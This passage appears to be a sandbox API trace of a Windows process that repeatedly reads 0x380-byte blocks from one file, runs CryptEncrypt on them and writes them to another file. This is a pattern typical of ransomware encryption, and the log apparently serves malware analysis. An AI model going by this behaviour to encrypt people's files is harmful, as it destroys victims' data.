lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.369] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.370] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.371] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.372] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.373] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.374] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) 